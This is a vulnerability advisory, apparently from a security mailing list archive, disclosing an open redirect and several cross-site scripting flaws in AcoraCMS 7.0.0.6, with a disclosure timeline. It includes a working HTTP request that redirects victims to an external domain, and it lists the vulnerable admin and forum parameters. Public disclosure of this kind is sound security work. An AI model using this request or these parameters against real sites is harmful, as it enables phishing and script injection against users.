AcoraCMS browser redirect and Cross-site scripting vulnerabilities

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

 



https://www.osisecurity.com.au/acoracms-browser-redirect-and-cross-site-scripting-vulnerabilities.html

Date:
04-Apr-2017

Product:
AcoraCMS

Versions affected:
7.0.0.6 (known bugs from 6.0.6 are still present
http://www.digitalsec.net/stuff/explt+advs/CM3.AcoraCMS.v6.txt).

Vulnerabilities:
1) Arbitrary browser redirect:

POST /forums/login.asp HTTP/1.1
Host: [target]
Content-Type: application/x-www-form-urlencoded
Content-Length: 70
cmRedirect=//osisecurity.com.au&strForumsLoginPrefix=&username=test&password=test

HTTP/1.1 302 Object moved
Cache-Control: private
Content-Length: 141
Content-Type: text/html; Charset=utf-8
Location: //osisecurity.com.au
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 14 Jul 2015 05:13:12 GMT

2) Cross-site scripting

/AcoraCMS/Admin/interface.asp [name of an arbitrarily supplied URL parameter]
/AcoraCMS/Admin/users/password_submit.asp [username parameter]
/AcoraCMS/Admin/users/password_submit.asp [email parameter]
/forums/profile_submit.asp [FunctionName parameter]
/forums/profile_submit.asp [cmFields parameter]
/forums/profile_submit.asp [fusername parameter]
/search/Default.aspx [SearchType parameter]
/users/requestaccess.aspx [cmFields parameter]

Credit:
Discovered by Patrick Webster

Disclosure timeline:
14-Jul-2015 - Discovered during audit.
01-Sep-2015 - Reported to vendor.
04-Apr-2017 - Public disclosure.

About OSI Security:

OSI Security is an independent network and computer security auditing
and consulting company based in Sydney, Australia. We provide internal
and external penetration testing, vulnerability auditing and wireless
site audits, vendor product assessments, secure network design,
forensics and risk mitigation services.

We can be found at http://www.osisecurity.com.au/



[Index of Archives]     [Linux Security]     [Netfilter]     [PHP]     [Yosemite News]     [Linux Kernel]

  Powered by Linux